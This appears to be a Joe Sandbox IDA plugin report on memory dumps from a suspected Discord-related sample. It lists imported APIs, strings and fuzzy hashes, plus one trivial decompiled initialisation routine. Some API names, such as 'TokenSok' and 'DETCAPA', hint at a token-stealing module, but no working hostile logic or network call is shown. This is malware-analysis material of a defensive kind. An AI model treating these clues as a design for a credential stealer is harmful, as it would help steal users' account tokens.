Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Ss6assign$IlicN9__gnu_cxx6__stoaSs7compareWindow_errno$DesktopEventIncillvRectResetSleep
String ID: |m$m$m$m$m
API String ID: 2369349269-4048705356
Opcode ID: 4cf535ada559fd0fd982260930dbab1e8493efe623e6ead05d49a8e46e4b0113
Instruction ID: 6efa10a8f0982653fc311b861c5ba9b4b4c29252c52d2eae01b5913fde0e3089
Opcode Fuzzy Hash: 4cf535ada559fd0fd982260930dbab1e8493efe623e6ead05d49a8e46e4b0113
Instruction Fuzzy Hash: 20B132F2907A009FEB00BBB4D14A26D3AF0BB82614F55092DD655EF245FF34D8958B83

Uniqueness

Uniqueness Score: -1.00%

Function 6DE95610 Relevance: 66.7, APIs: 26, Strings: 12, Instructions: 229COMMON

Download Yara Rule

APIs

_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95632
time.MSVCRT ref: 6DE95675
time.MSVCRT ref: 6DE95686
localtime.MSVCRT ref: 6DE95697
localtime.MSVCRT ref: 6DE956A8
CreateEventA.KERNEL32 ref: 6DE956F8
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9572B
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE9575B
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE9577F
getenv.MSVCRT ref: 6DE9579A
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE957AB
getenv.MSVCRT ref: 6DE957C6
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE957D7
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE957F7
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE9581B
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE9583F
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95863
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95887
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE958AB
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE958CF
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE958F3
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95917
_ZN6configC1Ev.DPUB1 ref: 6DE95AAA

Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9391F
Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9393E
Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9395D
Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9397C
Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9399E
Part of subcall function 6DE93900: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE939C0

_ZN7config1C1Ev.DPUB1 ref: 6DE95AC0

Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C4F
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C6E
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C8D
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CAC
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CCB
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CEA
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D09
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D28
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D47
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D66
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D85
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DA4
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DC3
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DE2
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E01
Part of subcall function 6DE93C30: _ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E20

_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95AE1
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE95B05

Strings

Xm, xrefs: 6DE9579F
Tm, xrefs: 6DE957CB
Hm, xrefs: 6DE9582F
0m, xrefs: 6DE95907
Lm, xrefs: 6DE9580B
4m, xrefs: 6DE958E3
@m, xrefs: 6DE95877
8m, xrefs: 6DE958BF
Dm, xrefs: 6DE95853
Pm, xrefs: 6DE957EB
@m, xrefs: 6DE95AA5
<m, xrefs: 6DE9589B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: S_constructSs12_$getenvlocaltimetime$CreateEventN6configN7config1
String ID: 0m$4m$8m$<m$@m$@m$Dm$Hm$Lm$Pm$Tm$Xm
API String ID: 350329813-3746712957
Opcode ID: e931c4d3f25d0d2425a67a5e112b89a00d97916530e07fdbf7dcd05632d1a8f5
Instruction ID: 1471665fc47a3e2855788015c63bc2c71122c7bd88a1fc535074697b1a64c973
Opcode Fuzzy Hash: e931c4d3f25d0d2425a67a5e112b89a00d97916530e07fdbf7dcd05632d1a8f5
Instruction Fuzzy Hash: 5BB1B8B481B7009ED7006FA4C15A71E7AF1BB82B48F66491ED2D99F382DF785444CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83160 Relevance: 66.4, APIs: 44, Instructions: 446COMMON

Download Yara Rule

APIs

_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83187
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8319C
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE831B3
_Z7DETCAPASsSsSsd.DPUB1 ref: 6DE831D6
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE83253
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8326B
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83280
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83295
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE832AA
_Z8TokenSokSsSsSsSs.DRES1 ref: 6DE832E9
_ZNSs4swapERSs.LIBSTDC++-6 ref: 6DE832FD
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8338A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8393C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE83956
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8396F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_$S_constructSs12_Ss4swapSs7compareToken
String ID:
API String ID: 3146493403-0
Opcode ID: bd40a7fba74dba6586befaaa13fe8d43cc4b0c1afed2b6eeebbf2bf6329ac5ff
Instruction ID: 61d58cebb2bcb235d3f280430f26b65656e57136e57da2c3e1aca928968e5033
Opcode Fuzzy Hash: bd40a7fba74dba6586befaaa13fe8d43cc4b0c1afed2b6eeebbf2bf6329ac5ff
Instruction Fuzzy Hash: 8B222CB49093158FEB10AFB8C95879DBBB0BF41314F1186ADD58C9B291EB758988CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6DE859B0 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE859B0() {
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				intOrPtr _v168;
				intOrPtr _v176;
				intOrPtr _v184;
				intOrPtr _v192;
				intOrPtr _v200;
				intOrPtr _v208;
				intOrPtr _v216;
				intOrPtr _v224;
				intOrPtr _v232;
				intOrPtr _v240;
				intOrPtr _v248;
				intOrPtr _v256;
				intOrPtr _v264;
				intOrPtr _v272;
				char** _t66;
				char** _t67;
				char** _t68;
				char** _t69;
				char** _t70;
				char** _t71;
				char** _t72;
				char** _t73;
				char** _t74;
				char** _t75;
				char** _t76;
				char** _t77;
				char** _t78;
				char** _t79;
				char** _t80;
				char** _t81;
				char** _t82;
				char** _t83;
				char** _t84;
				char** _t85;
				char** _t86;
				char** _t87;
				char** _t88;
				char** _t89;
				char** _t90;
				char** _t91;
				char** _t92;
				char** _t93;
				char** _t94;
				char** _t95;
				char** _t96;

				 *0x6de9e580 = 0;
				_v24 = 4;
				 *_t66 = "rien";
				 *0x6de9e584 = 0;
				L6DE8DD80();
				_t67 = _t66 - 8;
				_v32 = 4;
				 *_t67 = "rien";
				L6DE8DD80();
				_t68 = _t67 - 8;
				_v40 = 4;
				 *_t68 = "rien";
				L6DE8DD80();
				_t69 = _t68 - 8;
				_v48 = 4;
				 *_t69 = "rien";
				L6DE8DD80();
				_t70 = _t69 - 8;
				_v56 = 4;
				 *_t70 = "rien";
				L6DE8DD80();
				_t71 = _t70 - 8;
				_v64 = 4;
				 *_t71 = "rien";
				L6DE8DD80();
				_t72 = _t71 - 8;
				_v72 = 4;
				 *_t72 = "rien";
				L6DE8DD80();
				_t73 = _t72 - 8;
				_v80 = 4;
				 *_t73 = "rien";
				L6DE8DD80();
				_t74 = _t73 - 8;
				_v88 = 4;
				 *_t74 = "rien";
				L6DE8DD80();
				_t75 = _t74 - 8;
				_v96 = 4;
				 *_t75 = "rien";
				L6DE8DD80();
				_t76 = _t75 - 8;
				_v104 = 4;
				 *_t76 = "rien";
				L6DE8DD80();
				_t77 = _t76 - 8;
				_v112 = 4;
				 *_t77 = "rien";
				L6DE8DD80();
				_t78 = _t77 - 8;
				_v120 = 4;
				 *_t78 = "rien";
				L6DE8DD80();
				_t79 = _t78 - 8;
				_v128 = 4;
				 *_t79 = "rien";
				L6DE8DD80();
				_t80 = _t79 - 8;
				_v136 = 4;
				 *_t80 = "rien";
				L6DE8DD80();
				_t81 = _t80 - 8;
				_v144 = 4;
				 *_t81 = "rien";
				L6DE8DD80();
				_t82 = _t81 - 8;
				_v152 = 4;
				 *_t82 = "rien";
				L6DE8DD80();
				_t83 = _t82 - 8;
				_v160 = 4;
				 *_t83 = "rien";
				L6DE8DD80();
				_t84 = _t83 - 8;
				_v168 = 4;
				 *_t84 = "rien";
				L6DE8DD80();
				_t85 = _t84 - 8;
				_v176 = 4;
				 *_t85 = "rien";
				L6DE8DD80();
				_t86 = _t85 - 8;
				_v184 = 4;
				 *_t86 = "rien";
				L6DE8DD80();
				_t87 = _t86 - 8;
				_v192 = 4;
				 *_t87 = "rien";
				L6DE8DD80();
				_t88 = _t87 - 8;
				_v200 = 4;
				 *_t88 = "rien";
				L6DE8DD80();
				_t89 = _t88 - 8;
				_v208 = 4;
				 *_t89 = "rien";
				L6DE8DD80();
				_t90 = _t89 - 8;
				_v216 = 4;
				 *_t90 = "rien";
				L6DE8DD80();
				_t91 = _t90 - 8;
				_v224 = 4;
				 *_t91 = "rien";
				L6DE8DD80();
				_t92 = _t91 - 8;
				_v232 = 4;
				 *_t92 = "rien";
				L6DE8DD80();
				_t93 = _t92 - 8;
				_v240 = 4;
				 *_t93 = "rien";
				L6DE8DD80();
				_t94 = _t93 - 8;
				_v248 = 4;
				 *_t94 = "rien";
				L6DE8DD80();
				_t95 = _t94 - 8;
				_v256 = 4;
				 *_t95 = "rien";
				L6DE8DD80();
				_t96 = _t95 - 8;
				_v264 = 4;
				 *_t96 = "rien";
				L6DE8DD80();
				_v272 = 4;
				 *(_t96 - 8) = "rien";
				L6DE8DD80();
				return 1;
			}

0x6de859b8
0x6de859c2
0x6de859ca
0x6de859d1
0x6de859db
0x6de859e0
0x6de859e8
0x6de859f0
0x6de859f7
0x6de859fc
0x6de85a04
0x6de85a0c
0x6de85a13
0x6de85a18
0x6de85a20
0x6de85a28
0x6de85a2f
0x6de85a34
0x6de85a3c
0x6de85a44
0x6de85a4b
0x6de85a50
0x6de85a58
0x6de85a60
0x6de85a67
0x6de85a6c
0x6de85a74
0x6de85a7c
0x6de85a83
0x6de85a88
0x6de85a90
0x6de85a98
0x6de85a9f
0x6de85aa4
0x6de85aac
0x6de85ab4
0x6de85abb
0x6de85ac0
0x6de85ac8
0x6de85ad0
0x6de85ad7
0x6de85adc
0x6de85ae4
0x6de85aec
0x6de85af3
0x6de85af8
0x6de85b00
0x6de85b08
0x6de85b0f
0x6de85b14
0x6de85b1c
0x6de85b24
0x6de85b2b
0x6de85b30
0x6de85b38
0x6de85b40
0x6de85b47
0x6de85b4c
0x6de85b54
0x6de85b5c
0x6de85b63
0x6de85b68
0x6de85b70
0x6de85b78
0x6de85b7f
0x6de85b84
0x6de85b8c
0x6de85b94
0x6de85b9b
0x6de85ba0
0x6de85ba8
0x6de85bb0
0x6de85bb7
0x6de85bbc
0x6de85bc4
0x6de85bcc
0x6de85bd3
0x6de85bd8
0x6de85be0
0x6de85be8
0x6de85bef
0x6de85bf4
0x6de85bfc
0x6de85c04
0x6de85c0b
0x6de85c10
0x6de85c18
0x6de85c20
0x6de85c27
0x6de85c2c
0x6de85c34
0x6de85c3c
0x6de85c43
0x6de85c48
0x6de85c50
0x6de85c58
0x6de85c5f
0x6de85c64
0x6de85c6c
0x6de85c74
0x6de85c7b
0x6de85c80
0x6de85c88
0x6de85c90
0x6de85c97
0x6de85c9c
0x6de85ca4
0x6de85cac
0x6de85cb3
0x6de85cb8
0x6de85cc0
0x6de85cc8
0x6de85ccf
0x6de85cd4
0x6de85cdc
0x6de85ce4
0x6de85ceb
0x6de85cf0
0x6de85cf8
0x6de85d00
0x6de85d07
0x6de85d0c
0x6de85d14
0x6de85d1c
0x6de85d23
0x6de85d30
0x6de85d38
0x6de85d3f
0x6de85d4f

APIs

_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE859DB
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE859F7
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A13
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A2F
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A4B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A67
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A83
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85A9F
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85ABB
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85AD7
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85AF3
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B0F
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B2B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B47
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B63
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B7F
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85B9B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85BB7
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85BD3
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85BEF
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C0B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C27
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C43
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C5F
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C7B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85C97
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85CB3
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85CCF
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85CEB
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85D07
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85D23
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85D3F

Strings

m, xrefs: 6DE85C4B
m, xrefs: 6DE85C2F
m, xrefs: 6DE85C67
m, xrefs: 6DE85C83

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Ss6assign
String ID: m$m$m$m
API String ID: 2270848772-3441661251
Opcode ID: ebb50247088b088631ebb3ea9c08a74bf5cd2b033a739cd535afaf5e17a3ed62
Instruction ID: f8442237d9f7f3d54771cec03c61f297dbd45a2d05caeec8af05fe47921b87b2
Opcode Fuzzy Hash: ebb50247088b088631ebb3ea9c08a74bf5cd2b033a739cd535afaf5e17a3ed62
Instruction Fuzzy Hash: E471EAF001B2409AE704BF24961B22D7EA0AFC2615F618D2CD7C9BF285EF754858CB57

Uniqueness

Uniqueness Score: -1.00%

Function 6DE942E0 Relevance: 48.4, APIs: 32, Instructions: 360COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9459B
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE945BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE945DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE945FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9461A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9463A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9465A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9467A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9469A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE946BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE946DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE946FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9471A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9473A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9475A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9477A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9479A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE947BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE947DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE947FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9481A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9483A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9485A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9487A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9489A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE948BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE948DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE948FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9491A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9493A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9495A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE9497A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_
String ID:
API String ID: 418774267-0
Opcode ID: fbb54b18d5033aa8954262ac05454d54f10831406ffad92e90fecba0007fca80
Instruction ID: d4f6d572516d5b6728e6ae6d545f74c86f7c6d15d94f05731cd6a9ed73145f89
Opcode Fuzzy Hash: fbb54b18d5033aa8954262ac05454d54f10831406ffad92e90fecba0007fca80
Instruction Fuzzy Hash: 04D1E47050A3028BC309EFBC8598519BBE4EF86375B214B7ED9658F1C4FF3AC5058A86

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81BD9 Relevance: 48.4, APIs: 32, Instructions: 357COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81EFA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81F1A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81F3A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81F5A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81F7A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81F9A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81FBA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81FDA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81FFA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8201A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8203A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8205A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8207A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8209A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE820BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE820DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE820FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8211A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8213A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8215A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8217A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8219A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE821BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE821DA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE821FA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8221A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8223A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8225A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8227A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8229A
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE822BA
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE822DA

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
